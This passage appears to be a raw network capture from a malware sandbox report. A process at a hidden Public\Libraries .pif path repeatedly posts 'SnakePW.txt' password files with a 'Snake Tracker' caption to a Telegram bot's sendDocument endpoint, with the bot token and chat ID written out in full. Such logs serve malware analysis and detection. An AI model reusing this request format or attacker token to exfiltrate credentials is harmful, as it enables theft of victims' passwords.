2024-11-26 07:25:34 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388862,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605934,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49806 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:34 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dcf5032218b
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:34 UTC | 537 | OUT | Data Ascii: --------------------------8dd0dcf5032218bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:35 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:35 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 33 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388864,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605935,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49810 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif

Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:35 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0dfed0e58a0d
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:35 UTC | 537 | OUT | Data Ascii: --------------------------8dd0dfed0e58a0dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:36 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:36 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:36 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388866,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605936,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49811 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif

Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:36 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e74ea27430b
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:36 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e74ea27430bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:36 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:36 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:36 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388868,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605936,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49813 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif

Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:36 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0de86b2c0ccf
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:36 UTC | 537 | OUT | Data Ascii: --------------------------8dd0de86b2c0ccfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:37 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:37 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:37 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388870,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605937,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49817 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif

Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:37 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e1651b783f6
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:37 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e1651b783f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:38 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:38 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:38 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388872,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605938,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49818 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif

Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:38 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e8c046fa382
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:38 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e8c046fa382Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:38 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:38 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:38 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388874,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605938,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49821 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif

Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:38 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e000d88a51d
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:38 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e000d88a51dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:39 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:39 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:39 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388876,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605939,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49823 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:39 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e2c5dc4481c
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:39 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e2c5dc4481cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:40 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:40 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:40 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388878,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605940,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49825 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:40 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0ea1aff451e4
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:40 UTC | 537 | OUT | Data Ascii: --------------------------8dd0ea1aff451e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:40 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:40 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:40 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388880,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605940,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49828 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:40 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e18ff2f9f9e
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:40 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e18ff2f9f9eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:41 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:41 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:41 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388882,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605941,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 49831 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:41 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e3f97e51cd2
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:41 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e3f97e51cd2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:42 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:42 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:42 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388884,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605942,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 49832 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:42 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0eb5ee92c4e0
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:42 UTC | 537 | OUT | Data Ascii: --------------------------8dd0eb5ee92c4e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:42 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:42 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:42 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388886,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605942,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 49836 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:42 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e2c53de666f
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:42 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e2c53de666fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:43 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:43 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:43 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388888,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605943,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
26          192.168.2.7  49839        149.154.167.220  443               7660  C:\Users\Public\Libraries\yihfsboC.pif
Timestamp  Bytes transferred  Direction  Data
2024-11-26 07:25:44 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e58399bf1a8
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:44 UTC  537  OUT
Data Ascii: --------------------------8dd0e58399bf1a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:44 UTC  388  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:44 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:44 UTC  521  IN
Data Ascii: {"ok":true,"result":{"message_id":388891,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605944,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
27          192.168.2.7  49840        149.154.167.220  443               7240  C:\Users\Public\Libraries\yihfsboC.pif
Timestamp  Bytes transferred  Direction  Data
2024-11-26 07:25:44 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0ecccaf1fdd6
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:44 UTC  537  OUT
Data Ascii: --------------------------8dd0ecccaf1fdd6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:44 UTC  388  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:44 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:44 UTC  521  IN
Data Ascii: {"ok":true,"result":{"message_id":388890,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605944,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
28          192.168.2.7  49842        149.154.167.220  443               7924  C:\Users\Public\Libraries\yihfsboC.pif
Timestamp  Bytes transferred  Direction  Data
2024-11-26 07:25:45 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0e425aa9301b
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:45 UTC  537  OUT
Data Ascii: --------------------------8dd0e425aa9301bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:46 UTC  388  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:45 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:46 UTC  521  IN
Data Ascii: {"ok":true,"result":{"message_id":388894,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605945,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
29          192.168.2.7  49846        149.154.167.220  443               7240  C:\Users\Public\Libraries\yihfsboC.pif
Timestamp  Bytes transferred  Direction  Data
2024-11-26 07:25:46 UTC  334  OUT  POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0ee23a537a0e
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:25:46 UTC  537  OUT
Data Ascii: --------------------------8dd0ee23a537a0eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:46 UTC  388  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:25:46 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:46 UTC  521  IN
Data Ascii: {"ok":true,"result":{"message_id":388896,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605946,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
30          192.168.2.7  49847        149.154.167.220  443               7660  C:\Users\Public\Libraries\yihfsboC.pif
Timestamp  Bytes transferred  Direction  Data
